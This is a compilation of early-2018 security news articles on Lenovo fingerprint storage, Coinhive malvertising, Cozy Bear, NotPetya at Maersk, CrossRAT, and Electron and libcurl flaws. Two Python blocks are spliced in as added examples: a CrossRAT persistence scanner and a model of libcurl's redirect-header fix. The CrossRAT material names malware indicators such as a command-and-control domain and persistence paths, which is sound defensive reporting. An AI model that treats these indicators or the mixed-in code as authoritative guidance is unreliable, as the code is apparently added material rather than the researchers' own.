Lenovo Fingerprint Manager Pro is a utility that allows users to log into their laptop and into configured websites using their fingerprint.

The flaw lies in how Fingerprint Manager Pro stores sensitive data such as fingerprint data and login credentials: it encrypts them with a weak algorithm and a hard-coded password, leaving them readable by any local non-administrative user.

Customers are urged to update Fingerprint Manager Pro to version 8.01.87 or later.

The complete list of laptops that need to update their Lenovo Fingerprint Manager Pro version is:

ThinkPad L560
ThinkPad P40 Yoga, P50s
ThinkPad T440, T440p, T440s, T450, T450s, T460, T540p, T550, T560
ThinkPad W540, W541, W550s
ThinkPad X1 Carbon (Type 20A7, 20A8), X1 Carbon (Type 20BS, 20BT)
ThinkPad X240, X240s, X250, X260
ThinkPad Yoga 14 (20FY), Yoga 460
ThinkCentre M73, M73z, M78, M79, M83, M93, M93p, M93z
ThinkStation E32, P300, P500, P700, P900

The flaw was disclosed by Lenovo this week; the company credited Jackson Thuraisamy, a senior security consultant with Security Compass, for the discovery.


Trend Micro spotted a malvertising campaign abusing Google’s DoubleClick to deliver Coinhive Miner
27.1.2018 securityaffairs Virus

Trend Micro uncovered a spike in the number of web miners over the past few days, including Coinhive, apparently linked to Google's DoubleClick ads served on YouTube and other sites.
The number of cyber-attacks involving cryptocurrencies has increased along with the rapid rise in the value of currencies such as Bitcoin and Ethereum.

Hackers have targeted almost every actor involved in the cryptocurrency business: individual users, miners and, of course, exchanges.

Security firms have detected several malware applications specifically designed to steal cryptocurrencies, and many websites have been compromised to install scripts that mine virtual coins by abusing the computational resources of unaware visitors.

Researchers at Trend Micro uncovered a spike in the number of Coinhive miners over the past few days, apparently linked to Google's DoubleClick ads served on YouTube and other sites.

“On January 24, 2018, we observed that the number of Coinhive web miner detections tripled due to a malvertising campaign. We discovered that advertisements found on high-traffic sites not only used Coinhive (detected by Trend Micro as JS_COINHIVE.GN), but also a separate web miner that connects to a private pool.” states the analysis published by Trend Micro.

"We detected an almost 285% increase in the number of Coinhive miners on January 24. We started seeing an increase in traffic to five malicious domains on January 18. After closely examining the network traffic, we discovered that the traffic came from DoubleClick advertisements."


The researchers observed two separate web cryptocurrency miner scripts, both hosted on AWS, that were called from a web page that presents the DoubleClick ad.

The advertisement contains JavaScript code that generates a random number between 1 and 101. When the number is greater than 10 (roughly 90% of the time), the advertisement loads the coinhive.min.js script, which mines using 80% of the CPU's power. In the remaining 10% of cases, the advertisement launches a private web miner, the mqoj_1.js script.

“The two web miners were configured with throttle 0.2, which means the miners will use 80% of the CPU’s resources for mining.” continues the analysis.


Google promptly took action against the ads that abuse users’ resources violating its policies.

Blocking JavaScript from running in the browser prevents the execution of Coinhive miners; the experts also suggest regularly patching and updating web browsers to reduce the risk.


Dutch Spies Watched as Russians Hacked US Democrats: Report
26.1.2018 securityweek BigBrothers

Dutch intelligence services hacked Russian cyber attackers and alerted US counterparts after watching them transfer "thousands" of Democratic Party emails ahead of the 2016 US election, Dutch media reported Friday.

The Dutch national intelligence service (AIVD) had been watching the notorious group known as Cozy Bear since 2014, according to the respected Volkskrant daily and the Dutch TV news programme Nieuwsuur.

But as well as stumbling upon the group's computer network which was run out of a university building near Moscow's Red Square, the Dutch agents also gained access to the security cameras surveilling the room.

"Not only can the intelligence service now see what the Russians are doing, they can also see who's doing it," the Volkskrant said, citing anonymous US and Dutch sources.

The AIVD alerted its US counterparts when in 2015 it became a "witness to the Russian hackers harassing and penetrating the leaders of the Democratic Party, transferring thousands of emails and documents," it said.

"Yet, it will be months before the United States realise what this warning means: that with these hacks the Russians have interfered with the American elections. And the AIVD hackers have seen it happening before their very eyes."

Cozy Bear has been widely blamed for meddling in the 2016 US elections won by now President Donald Trump.

Although Trump has vehemently denied working with the Russians, his White House is under investigation by special prosecutor and former FBI director Robert Mueller.

Mueller's team is seeking to uncover whether the Trump campaign colluded with Russia's efforts to sway the election, including leaks of hacked Democratic Party files.

Mueller's team has spent the past eight months interviewing members of Trump's campaign and White House staff, and has issued four indictments, with two guilty pleas.

A spokeswoman for the AIVD refused to confirm the Dutch media reports, telling AFP "we never comment on operations."

But American intelligence agencies have said "with high confidence" they believe the Kremlin was behind the attack on the Democratic Party.

That confidence is based on "AIVD hackers having had access to the office-like space in the centre of Moscow for years," the Volkskrant said, citing sources who added that the Dutch had provided "technical evidence" of the attack on the Democratic Party.


Maersk Reinstalled 50,000 Computers After NotPetya Attack
26.1.2018 securityweek Ransomware

Jim Hagemann Snabe, chairman of Danish shipping giant A.P. Moller–Maersk, revealed this week at the World Economic Forum in Switzerland that the company was forced to reinstall software on nearly 50,000 devices following the NotPetya attack.

In a panel on securing a common future in cyberspace, Hagemann Snabe, former co-CEO of SAP, said the NotPetya malware had hit a large number of systems housed by the company.

According to Hagemann Snabe, Maersk’s IT team had to reinstall software on its entire infrastructure, including 45,000 PCs and 4,000 servers, totaling 2,500 applications.

The mammoth task took only 10 days to complete, during which time the company manually coordinated operations. This was not easy considering that Maersk is the largest container shipping company in the world and it’s responsible for roughly 20 percent of world trade. Hagemann Snabe noted that a ship carrying 10,000-20,000 containers docks into a port every 15 minutes.

Maersk employees managed to manually process 80 percent of the work volume, but the NotPetya incident still cost the company $250-$300 million.

In the aftermath of the cyberattack, the shipping giant realized that its cybersecurity capabilities had been only “average,” but Hagemann Snabe says the company is now determined to improve cybersecurity to the point where it “becomes a competitive advantage.”

“We need a very significant increase in our level of understanding of this problem,” Hagemann Snabe told the panel. “It is time to stop being naive when it comes to cybersecurity. I think many companies will be caught if they are naive – even size does not help you. I think it is very important that we are not just reactive but proactive, and I think we can’t be average, we got to be the best we can.”

Hagemann Snabe believes his company was probably collateral damage in a state-sponsored attack.

The NotPetya malware outbreak, which U.S. and Ukrainian government agencies have attributed to Russia, affected tens of thousands of systems in more than 65 countries. Many of the victims were located in Ukraine, the home of a tax software firm whose product was used as the main attack vector.

Researchers initially believed NotPetya (also known as PetrWrap, exPetr, GoldenEye and Diskcoder.C) was a piece of ransomware. However, a closer analysis revealed that it was actually a wiper.

In addition to Maersk, the list of major organizations hit by the incident includes Rosneft, Merck, FedEx-owned TNT Express, Mondelez International, Nuance Communications, Reckitt Benckiser, and Saint-Gobain. These companies reported that the attack had cost them tens and even hundreds of millions of dollars.


The Dutch intelligence service AIVD ‘hacked’ Russian Cozy Bear systems for years
26.1.2018 securityaffairs BigBrothers

Spying on spies – The hackers from the Dutch intelligence service AIVD ‘compromised’ for years the network of the Russian APT Cozy Bear.
It's no mystery that technology firms that intend to do business in Russia need to allow Government experts to scan their code for backdoors and vulnerabilities.

The problem is that the same software is often used by the US Government, which means that Russian experts could find bugs or backdoors to exploit in cyber attacks against US agencies.

Many tech giants, including McAfee, SAP, Symantec, and HPE, have already allowed such reviews of their software; the risk is that foreign Governments could exploit a bug or a backdoor to control their products.

Other firms, like Trend Micro, have refused to allow the Russians to conduct a source code review of their products.

Of course, the companies defend their position by clarifying that the code reviews were done under controlled conditions and that no code was allowed to be copied.

The news of the day is that the Dutch intelligence service AIVD "hacked" Russian state-sponsored hackers.

The news was reported by the newspaper de Volkskrant: in 2014 the AIVD began monitoring the activity of the Russian APT Cozy Bear (aka APT29) and its efforts to hack into the systems of the US Democratic Party and US government servers.

The Dutch intelligence service AIVD provided the FBI with crucial information about Russian interference in the American elections.

The AIVD cyber spies also compromised the security cameras around the building used by the Cozy Bear crew; the Dutch agents were looking for known Russian spies entering the premises.

“Hackers from the Dutch intelligence service AIVD have provided the FBI with crucial information about Russian interference with the American elections,” reports the Dutch daily newspaper Volkskrant.nl.

“That’s how the AIVD becomes witness to the Russian hackers harassing and penetrating the leaders of the Democratic Party, transferring thousands of emails and documents. It won’t be the last time they alert their American counterparts.”


The Dutch hackers conducted a Computer Network Attack against the Russians; their unit carries out offensive operations aimed at compromising adversary networks.

The unit operates under the Joint Sigint Cyber Unit, a collaborative unit of the AIVD and the Dutch Military Intelligence and Security Service MIVD, of about 300 people.

The Dutch cyber unit is composed of about 80-100 people; some of them focus on intercepting communications or managing sources, while another team is dedicated to Computer Network Defence.

It's unknown exactly what information the Dutch hackers collected; the only certainty is that it linked Cozy Bear to the attacks against the US Government.

“Three American intelligence services state with ‘high confidence’ that the Kremlin was behind the attack on the Democratic Party. That certainty, sources say, is derived from the AIVD hackers having had access to the office-like space in the center of Moscow for years. This is so exceptional that the directors of the foremost American intelligence services are all too happy to receive the Dutchmen.” continues the newspaper.

The Cozy Bear hackers are located in a university building near Red Square; the team is composed on average of ten people. The entrance is in a curved hallway monitored by a security camera that was hacked by the Dutch cyber spies.

Thanks to the AIVD, the NSA was able to locate the command and control servers used by Cozy Bear while it was targeting the systems at the State Department.

“Access to Cozy Bear turns out to be a goldmine for the Dutch hackers. For years, it supplies them with valuable intelligence about targets, methods and the interests of the highest ranking officials of the Russian security service. From the pictures taken of visitors, the AIVD deduces that the hacker group is led by Russia’s external intelligence agency SVR.” continues the Volkskrant.

“There’s a reason the AIVD writes in its annual report about 2014 that many Russian government officials, including president Putin, use secret services to obtain information.”

The AIVD hackers lost access to Cozy Bear's computer network after an operation that lasted between 1 and 2.5 years, likely because the Russians cut off their access.


Stealth CrossRAT malware targets Windows, MacOS, and Linux systems
26.1.2018 securityaffairs Virus

The popular former NSA hacker Patrick Wardle published a detailed analysis of the CrossRAT malware used by Dark Caracal for surveillance.
Last week a joint report published by security firm Lookout and digital civil rights group the Electronic Frontier Foundation detailed the activity of a long-running hacking group linked to the Beirut Government and tracked as Dark Caracal. The hacking campaigns conducted by Dark Caracal leverage custom Android malware bundled into fake versions of secure messaging apps like Signal and WhatsApp.

The report detailed a new strain of cross-platform malware tracked as CrossRAT (version 0.1); it is a remote access Trojan that can infect systems running Windows, Solaris, Linux, and macOS.

The malware implements classic RAT features, such as taking screenshots and running arbitrary commands on the infected systems.

At the time of its discovery, the malware was detected by only two of 58 anti-virus engines.


The Dark Caracal attack chain relies primarily on social engineering: the hackers sent messages to the victims via Facebook group posts and WhatsApp messages. At a high level, the hackers designed three different kinds of phishing messages to trick victims into visiting a compromised website, a typical watering hole attack.

CrossRAT is written in the Java programming language, so researchers can easily decompile it.
The popular former NSA hacker Patrick Wardle published a detailed analysis of the CrossRAT malware.

Once executed on the victim’s system, CrossRAT will determine the operating system it’s running on to trigger the proper installation procedure.

On Linux systems, the RAT also attempts to query systemd files to determine the distribution (i.e. Arch Linux, Centos, Debian, Kali Linux, Fedora, and Linux Mint).

Wardle explained that the author implemented a specific persistence mechanism for each operating system. Once installed, the malware will attempt to contact the C&C server.

"Now the malware has persistently installed itself, it checks in with the C&C server for tasking. As noted in the EFF/Lookout report the malware will connect to flexberry.com on port 2223," states the analysis published by Wardle.

The expert discovered that CrossRAT includes a reference to the "jnativehook" Java library, which provides global keyboard and mouse listeners for Java, but he didn't see any code within the implant that actually used the jnativehook package, likely because the analyzed version was still under development.

Wardle detailed the persistence mechanism implemented for each OS; this information is useful for detecting the presence of CrossRAT on a system.

Windows:
Check the HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ registry key. If infected it will contain a command that includes, java, -jar and mediamgrs.jar.
Mac:
Check for jar file, mediamgrs.jar, in ~/Library. Also look for launch agent in /Library/LaunchAgents or ~/Library/LaunchAgents named mediamgrs.plist.
Linux:
Check for jar file, mediamgrs.jar, in /usr/var. Also look for an ‘autostart’ file in the ~/.config/autostart likely named mediamgrs.desktop.


Beware! Undetectable CrossRAT malware targets Windows, MacOS, and Linux systems
26.1.2018 thehackernews Virus

Are you using Linux or Mac OS? If you think your system is not prone to viruses, then you should read this.
A wide range of cybercriminals are now using a new piece of 'undetectable' spying malware that targets Windows, macOS, Solaris and Linux systems.
Just last week we published a detailed article on the report from EFF/Lookout that revealed a new advanced persistent threat (APT) group, called Dark Caracal, engaged in global mobile espionage campaigns.
Although the report focused on the group's successful large-scale hacking operations against mobile phones rather than computers, it also shed light on a new piece of cross-platform malware called CrossRAT (version 0.1), which is believed to have been developed by, or for, the Dark Caracal group.
CrossRAT is a cross-platform remote access Trojan that can target all four popular desktop operating systems, Windows, Solaris, Linux, and macOS, enabling remote attackers to manipulate the file system, take screenshots, run arbitrary executables, and gain persistence on the infected systems.
According to researchers, the Dark Caracal hackers do not rely on any "zero-day exploits" to distribute their malware; instead, they use basic social engineering via posts in Facebook groups and WhatsApp messages, encouraging users to visit hacker-controlled fake websites and download malicious applications.
CrossRAT is written in Java programming language, making it easy for reverse engineers and researchers to decompile it.

Since at the time of writing only two out of 58 popular antivirus solutions (according to VirusTotal) can detect CrossRAT, ex-NSA hacker Patrick Wardle decided to analyse the malware and provide a comprehensive technical overview including its persistence mechanism, command and control communication as well as its capabilities.
CrossRAT 0.1 — Cross-Platform Persistent Surveillance Malware
Once executed on the targeted system, the implant (hmar6.jar) first checks the operating system it's running on and then installs itself accordingly.
Besides this, the CrossRAT implant also attempts to gather information about the infected system, including the installed OS version, kernel build and architecture.
Moreover, for Linux systems, the malware also attempts to query systemd files to determine its distribution, like Arch Linux, Centos, Debian, Kali Linux, Fedora, and Linux Mint, among many more.
CrossRAT then implements OS-specific persistence mechanisms so that it automatically (re)executes whenever the infected system is rebooted, and registers itself with the C&C server, allowing remote attackers to send commands and exfiltrate data.
As reported by Lookout researchers, the CrossRAT variant distributed by the Dark Caracal hacking group connects to 'flexberry(dot)com' on port 2223; this information is hardcoded in the 'crossrat/k.class' file.
CrossRAT Includes Inactive Keylogger Module

The malware has been designed with some basic surveillance capabilities, which are triggered only when it receives the corresponding predefined commands from the C&C server.
Interestingly, Patrick noticed that CrossRAT has also been programmed to use 'jnativehook,' an open-source Java library for listening to keyboard and mouse events, but the malware does not have any predefined command to activate this keylogger.
"However, I didn’t see any code within that implant that referenced the jnativehook package—so at this point it appears that this functionality is not leveraged? There may be a good explanation for this. As noted in the report, the malware identifies it’s version as 0.1, perhaps indicating it’s still a work in progress and thus not feature complete," Patrick said.
How to Check If You're Infected with CrossRAT?
Since CrossRAT persists in an OS-specific manner, detecting the malware will depend on what operating system you are running.
For Windows:
Check the 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\' registry key.
If infected it will contain a command that includes, java, -jar and mediamgrs.jar.
For macOS:
Check for jar file, mediamgrs.jar, in ~/Library.
Also look for launch agent in /Library/LaunchAgents or ~/Library/LaunchAgents named mediamgrs.plist.
For Linux:
Check for jar file, mediamgrs.jar, in /usr/var.
Also look for an 'autostart' file in the ~/.config/autostart likely named mediamgrs.desktop.
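A host check for the persistence artefacts listed in both write-ups above, as an added example rather than code from Wardle, Lookout or EFF. It inspects the launcher's command (LaunchAgent ProgramArguments, XDG Exec= line, Run-key value) instead of trusting the file name, so a renamed launcher that still starts java -jar mediamgrs.jar is caught; the file-system calls are injectable so demo() can exercise the Linux logic against a constructed in-memory tree, and the sample plist/desktop contents are constructed, not captured.

```python
import os
import platform
import plistlib
from pathlib import Path, PurePosixPath

JAR_NAME = "mediamgrs.jar"
RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"

# Constructed samples (not captured from a real infection) of what the launchers look like.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>mediamgrs</string>
  <key>ProgramArguments</key>
  <array><string>java</string><string>-jar</string><string>/Users/u/Library/mediamgrs.jar</string></array>
</dict></plist>"""
SAMPLE_DESKTOP = "[Desktop Entry]\nType=Application\nName=mediamgrs\nExec=java -jar /usr/var/mediamgrs.jar\n"


def command_matches(cmd):
    """A launcher command is suspicious when it runs java -jar on mediamgrs.jar, as the write-ups describe."""
    c = cmd.lower()
    return "java" in c and "-jar" in c and JAR_NAME in c


def launch_agent_is_suspicious(plist_bytes):
    """macOS: check a LaunchAgent's ProgramArguments instead of trusting its file name."""
    try:
        data = plistlib.loads(plist_bytes)
    except Exception:
        return False  # not a parseable plist at all
    args = data.get("ProgramArguments", []) if isinstance(data, dict) else []
    return isinstance(args, list) and command_matches(" ".join(map(str, args)))


def desktop_entry_is_suspicious(text):
    """Linux: check the Exec= line of an XDG autostart entry."""
    for line in text.splitlines():
        if line.strip().lower().startswith("exec="):
            return command_matches(line.split("=", 1)[1])
    return False


def scan_windows_run_key():
    """Windows: enumerate HKCU Run values; winreg exists only on Windows, so import it lazily."""
    import winreg
    hits = []
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY) as key:
        i = 0
        while True:
            try:
                name, value, _ = winreg.EnumValue(key, i)
            except OSError:
                break  # no more values
            if command_matches(str(value)):
                hits.append("HKCU\\%s\\%s = %s" % (RUN_KEY, name, value))
            i += 1
    return hits


def scan_posix(system, home, exists, listdir, read_bytes):
    """macOS/Linux: jar drop location plus launcher directory; file-system access is injected."""
    home = PurePosixPath(home)
    if system == "Darwin":
        jars = [home / "Library" / JAR_NAME]
        dirs = [PurePosixPath("/Library/LaunchAgents"), home / "Library" / "LaunchAgents"]
        suffix, check = ".plist", launch_agent_is_suspicious
    elif system == "Linux":
        jars = [PurePosixPath("/usr/var") / JAR_NAME]
        dirs = [home / ".config" / "autostart"]
        suffix, check = ".desktop", lambda b: desktop_entry_is_suspicious(b.decode("utf-8", "replace"))
    else:
        return []
    findings = ["jar present: %s" % j for j in jars if exists(str(j))]
    for d in dirs:
        if not exists(str(d)):
            continue
        for name in listdir(str(d)):
            if not name.endswith(suffix):
                continue
            try:
                blob = read_bytes(str(d / name))
            except OSError:
                continue  # unreadable (e.g. permissions); skip rather than abort the scan
            if check(blob):
                findings.append("launcher runs %s: %s" % (JAR_NAME, d / name))
    return findings


def scan_host():
    """Run the checks for the platform this script is executing on."""
    system = platform.system()
    if system == "Windows":
        return scan_windows_run_key()
    return scan_posix(system, str(Path.home()), os.path.exists, os.listdir,
                      lambda p: Path(p).read_bytes())


def demo():
    """Exercise the Linux logic against a constructed in-memory file system."""
    fs = {"/usr/var/mediamgrs.jar": b"PK..",
          "/home/u/.config/autostart/mediamgrs.desktop": SAMPLE_DESKTOP.encode(),
          "/home/u/.config/autostart/nm-applet.desktop": b"[Desktop Entry]\nExec=nm-applet\n"}
    dirs = {"/usr/var", "/home/u/.config/autostart"}
    return scan_posix("Linux", "/home/u",
                      exists=lambda p: p in fs or p in dirs,
                      listdir=lambda p: sorted(k.rsplit("/", 1)[1] for k in fs if k.rsplit("/", 1)[0] == p),
                      read_bytes=lambda p: fs[p])


if __name__ == "__main__":
    for finding in scan_host():
        print("[!]", finding)
```

A hit on the jar path or on a launcher is a strong indicator; an absent jar with a matching launcher still deserves a look, since the jar may have been cleaned up after persistence was set.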
How to Protect Against CrossRAT Trojan?

Only 2 out of 58 antivirus products detect CrossRAT at the time of writing, which means that your AV would hardly protect you from this threat.
"As CrossRAT is written in Java, it requires Java to be installed. Luckily recent versions of macOS do not ship with Java," Patrick said.
"Thus, most macOS users should be safe! Of course, if a Mac user already has Java installed, or the attacker is able to coerce a naive user to install Java first, CrossRAT will run just dandy, even on the latest version of macOS (High Sierra)."
Users are advised to install behaviour-based threat detection software. Mac users can use BlockBlock, a simple utility developed by Patrick that alerts users whenever anything is persistently installed.


Critical Flaw Hits Popular Windows Apps Built With Electron JS Framework
26.1.2018 thehackernews
Vulnerability

A critical remote code execution vulnerability has been reported in Electron, a popular web application framework that powers thousands of widely used desktop applications, including Skype, Signal, WordPress and Slack.
Electron is an open-source framework that is based on Node.js and Chromium Engine and allows app developers to build cross-platform native desktop applications for Windows, macOS and Linux, without knowledge of programming languages used for each platform.
The vulnerability, tracked as CVE-2018-1000006, affects only those apps that run on Microsoft Windows and register themselves as the default handler for a protocol like myapp://.
"Such apps can be affected regardless of how the protocol is registered, e.g. using native code, the Windows registry, or Electron's app.setAsDefaultProtocolClient API," Electron says in an advisory published Monday.
The Electron team has also confirmed that applications designed for Apple's macOS and Linux are not vulnerable to this issue, and nor are apps (including Windows ones) that do not register themselves as the default handler for a protocol like myapp://.
The Electron developers have already released fixed versions of the framework, 1.8.2-beta.4, 1.7.11 and 1.6.16, to address this critical vulnerability.
"If for some reason you are unable to upgrade your Electron version, you can append -- as the last argument when calling app.setAsDefaultProtocolClient, which prevents Chromium from parsing further options," the company says.
End users can do nothing about this vulnerability; instead, developers using Electron JS framework have to upgrade their applications immediately to protect their user base.
Few details of the remote code execution vulnerability have been disclosed yet, and the advisory does not name any of the vulnerable apps (those that make themselves the default protocol handler), for security reasons.
We will update you as soon as any details about the flaw come out.


EU Antitrust Regulators Fine Qualcomm $1.2 Billion Over Apple Deal
26.1.2018 thehackernews IT


The European Commission has levied a fine of €997 Million, approximately $1.2 Billion, against U.S. chipmaker Qualcomm Inc. for violating antitrust laws in a series of deals with Apple by "abusing its market dominance in LTE baseband chipsets."
According to the European Union (EU), Qualcomm paid Apple billions of dollars to make the iPhone-maker exclusively use its 4G chips in all its iPhones and iPads, reducing competition from other competing manufacturers in the LTE baseband chip industry like Intel.
The European Commission launched an investigation in 2015, which revealed that Qualcomm abused its market dominance in LTE baseband chipsets and struck a deal with Apple in 2011, which meant the iPhone maker would have to repay Qualcomm if it decided to use a rival's chipsets until the end of 2016, hurting innovation in the chip sector.
"This meant that no rival could effectively challenge Qualcomm in this market, no matter how good their products were. This is illegal under EU antitrust rules and why we have taken today's decision," EU competition commissioner Margrethe Vestager said in a press statement.
Apple received payments from Qualcomm for approximately 5 years between 2011 and 2016. The company still uses Qualcomm components in its iPhones and iPads, but it began using Intel LTE modems in its iPhone 7 and 7 Plus devices after the agreement ended.
The fine imposed on the chip maker is hefty, but won't hurt Qualcomm's bottom line significantly as it represents 4.9 percent of the company's turnover in 2017, according to the EU's antitrust commission.
Qualcomm said it 'strongly disagrees' with the European Commission's decision and will 'immediately appeal' it at the General Court of the European Union. The company also believes its agreement with Apple does not violate European Union competition law.
"We are confident this agreement did not violate EU competition rules or adversely affect market competition or European consumers," Qualcomm General Counsel Don Rosenberg said in a statement. "We have a strong case for judicial review, and we will immediately commence that process."
Qualcomm is also facing a patent fight with Apple over chip royalties, and is simultaneously fending off a $100 billion hostile takeover from rival chipmaker Broadcom; it rejected the bid last November, saying it 'dramatically undervalued' the company.


Yikes! Three armed men tried to rob a Bitcoin Exchange in Canada
26.1.2018 thehackernews Crime

As many non-tech savvy people think that Bitcoin looks like a Gold coin as illustrated in many stock images, perhaps these robbers also planned to rob a cryptocurrency exchange thinking that way.
All jokes apart, we saw one such attempt on Tuesday morning, when three men armed with handguns entered the offices of a Canadian Bitcoin exchange in Ottawa, and restrained four of its employees.
The intruders then struck one of the employees in the head with a handgun, asking them to make an outbound transaction from the cryptocurrency exchange.
A fifth employee in another cabin, who remained unseen in an office, called the police before any assets could be taken, and the robbers left empty-handed.
One of the suspects was arrested later Wednesday after arriving police officers saw him run into a ravine north of Colonnade Road and deployed "extensive resources," including K-9 unit officers, to find him, CBC News reports.
"Police are looking for two additional suspects, both described as black males," police said. "Investigators are also interested in identifying and speaking to a person of interest that was inside the premise as the suspects arrived. That person did not remain at the scene."
The suspect in custody, identified as 19-year-old Jimmy St-Hilaire, has been charged with the following offences:
5 counts of robbery with a firearm
5 counts of point a firearm
5 counts of forcible confinement
Wear disguise
Conspiracy to Commit an indictable offence
Carry concealed weapon
Possess firearm while prohibited
Possess weapon for committing an offence
Possess loaded regulated firearm
St-Hilaire is set to appear in court on January 24, 2018. Ottawa police are now looking for the remaining two suspects.
The authorities have not revealed the name of the cryptocurrency exchange.
A similar incident happened last month when armed robbers kidnapped a top executive at UK-registered crypto-exchange EXMO Finance and allegedly stole more than $1.8 million of Ether for releasing him.
The New York District Attorney's Office charged New Jersey native Louis Meza with the kidnapping and robbery, claiming Meza "demanded that the victim turns over his cell phone, wallet, and keys while holding the victim at gunpoint."


Maersk chair revealed its company reinstalled 45,000 PCs and 4,000 Servers after NotPetya Attack
26.1.2018 securityaffairs
Ransomware

Shipping giant Maersk's chair Jim Hagemann Snabe revealed that the company reinstalled 45,000 PCs and 4,000 servers after the NotPetya attack.
Maersk was one of the companies hit by the massive NotPetya attack; in August 2017 the company announced that it would incur losses of hundreds of millions of U.S. dollars due to the ransomware attack.

According to the second quarter earnings report, the company expected losses between $200 million and $300 million due to “significant business interruption,” because it was forced to temporarily halt critical systems infected with the ransomware.


Now the Møller-Maersk chair Jim Hagemann Snabe has shared further details on the attack suffered by the company during a speech at the World Economic Forum this week.

Snabe explained that the attack forced the IT staff to reinstall “4,000 new servers, 45,000 new PCs, and 2,500 applications,” practically “a complete infrastructure.”

The IT staff worked hard for ten days to restore normal operations.

“And that was done in a heroic effort over ten days,” Snabe said.

“Normally – I come from the IT industry – you would say that would take six months. I can only thank the employees and partners we had doing that.”

Snabe called the incident a “very significant wake-up call”: a strong security posture is essential for a company to develop its business.

Snabe pointed out that Maersk was a victim of the militarization of cyberspace: the damage was caused by a cyber weapon used by a foreign government to hit Ukraine.

A Maersk ship docks somewhere in the world every 15 minutes, unloading between 10,000 and 20,000 containers. The effects of the attack were dramatic, and only the heroic effort of the staff, who manually restored normal operations, allowed the company to contain the damage.

Snabe said the company saw only “a 20 per cent drop in volumes,” and described the efforts of its IT staff as “human resilience”.

Snabe is aware of the risks for companies that operate on the Internet and urges an improvement of infrastructure.

“There is a need for a radical improvement of infrastructure,” he said.

The Maersk chair also highlighted the importance of collaboration between companies, technology companies, and law enforcement.


Former Yahoo CISO Bob Lord Joins DNC
26.1.2018 securityweek IT

Former Yahoo chief information security officer Bob Lord has been appointed chief security officer at the Democratic National Committee (DNC), the formal governing body for the United States Democratic Party.

The announcement was made on Thursday and Lord has already told his Twitter followers that he is looking to hire.

“Very honored to be able to work with [DNC CTO Raffi Krikorian], [DNC Chairman Tom Perez], and the rest of the amazing team at the DNC,” Lord said on Twitter.

Lord is the DNC’s first CSO. His hiring comes after the organization was the target of cyberattacks in the months leading up to the 2016 presidential election in the United States. Security firms and intelligence agencies attributed the attacks to threat groups previously linked to the Russian government.

Before joining the DNC, Lord was Yahoo’s CISO for nearly two years. While at the tech firm, he led the investigations into the massive data breaches suffered by the company in 2013 and 2014. He was lured by Yahoo after the company’s former security chief, Alex Stamos, joined Facebook as CSO.

A veteran with more than 20 years of experience in cybersecurity, Lord has held leadership positions at AOL, Red Hat, Twitter and Rapid7.


Information Disclosure, DoS Flaws Patched in libcurl
25.1.2018 securityweek
Vulnerability

The developers of the popular multiprotocol data transfer library libcurl informed users on Wednesday that the latest version addresses two vulnerabilities.

Libcurl is a free and highly portable file transfer library that supports roughly two dozen protocols and various features. The libcurl website lists more than 250 organizations that use the library in their products, including Adobe, Apple, the BBC, BMW, Broadcom, Cisco, Electronic Arts, Facebook, Google, Intel, Mozilla, Samsung, Sony, VMware and several cybersecurity firms.

The latest Libcurl release, version 7.58.0, patches a total of 82 bugs, including two vulnerabilities that can lead to information disclosure or a denial-of-service (DoS) condition.

One of the security holes, tracked as CVE-2018-1000007, can lead to authentication data getting leaked to third parties.

“When asked to send custom headers in its HTTP requests, libcurl will send that set of headers first to the host in the initial URL but also, if asked to follow redirects and a 30X HTTP response code is returned, to the host mentioned in URL in the Location: response header value,” developers said in an advisory.

“Sending the same set of headers to subsequent hosts is in particular a problem for applications that pass on custom Authorization: headers, as this header often contains privacy sensitive information or data that could allow others to impersonate the libcurl-using client's request,” they added.

This vulnerability has existed in the libcurl code for a long time. “It existed in the first commit we have recorded in the project,” developers noted.
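The redirect header policy the CVE-2018-1000007 fix introduces, modelled in Python as an added example (not curl's own code): custom headers still go to the original host, but Authorization: is withheld from a different host unless the caller opts in. The opt-in is named after libcurl's real CURLOPT_UNRESTRICTED_AUTH option; the functions, the redirect table and the token value are constructed for this example.

```python
"""Model of the post-7.58.0 libcurl rule for custom headers on redirects."""
from urllib.parse import urljoin, urlparse

SENSITIVE = {"authorization"}          # never forwarded to another host
DEFAULT_PORTS = {"http": 80, "https": 443}


def origin(url):
    """(host, port) with the scheme's default port filled in, so that
    https://a.example and https://a.example:443 count as the same host."""
    p = urlparse(url)
    return ((p.hostname or "").lower(), p.port or DEFAULT_PORTS.get(p.scheme.lower()))


def headers_for_hop(first_url, hop_url, custom_headers, unrestricted_auth=False):
    """Custom headers to send for one request of a redirect chain.
    unrestricted_auth mirrors CURLOPT_UNRESTRICTED_AUTH: the pre-fix behaviour."""
    if unrestricted_auth or origin(first_url) == origin(hop_url):
        return dict(custom_headers)
    return {k: v for k, v in custom_headers.items() if k.lower() not in SENSITIVE}


def follow_chain(first_url, responses, custom_headers, unrestricted_auth=False, max_redirs=5):
    """Walk a redirect chain and record which headers each hop would receive.
    `responses` maps a URL to (status, Location header or None); it stands in
    for the servers. Returns a list of (url, headers) in request order."""
    sent = []
    url = first_url
    for _ in range(max_redirs + 1):
        hdrs = headers_for_hop(first_url, url, custom_headers, unrestricted_auth)
        sent.append((url, hdrs))
        status, location = responses.get(url, (200, None))
        if 300 <= status < 400 and location:
            url = urljoin(url, location)   # relative Location: values resolve here
            continue
        return sent
    raise RuntimeError("too many redirects")


# Constructed scenario: the API host bounces the client to a different host.
RESPONSES = {
    "https://api.example/login": (302, "https://cdn.example.net/login"),
    "https://cdn.example.net/login": (200, None),
}
CUSTOM = {"Authorization": "Bearer constructed-token", "X-Trace": "abc"}

if __name__ == "__main__":
    for url, hdrs in follow_chain("https://api.example/login", RESPONSES, CUSTOM):
        print(url, "->", sorted(hdrs))
```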

The second flaw, identified as CVE-2018-1000005, has been described as an out-of-bounds read issue that can lead to a DoS condition or information disclosure.

“The problem is that the code that creates HTTP/1-like headers from the HTTP/2 trailer data once appended a string like ‘:’ to the target buffer, while this was recently changed to ‘: ‘ (a space was added after the colon) but the associated math wasn't updated correspondingly,” developers explained. “When accessed, the data is read out of bounds and causes either a crash or that the (too large) data gets passed to the libcurl callback.”

This vulnerability only affects libcurl versions 7.49.0 through 7.57.0.

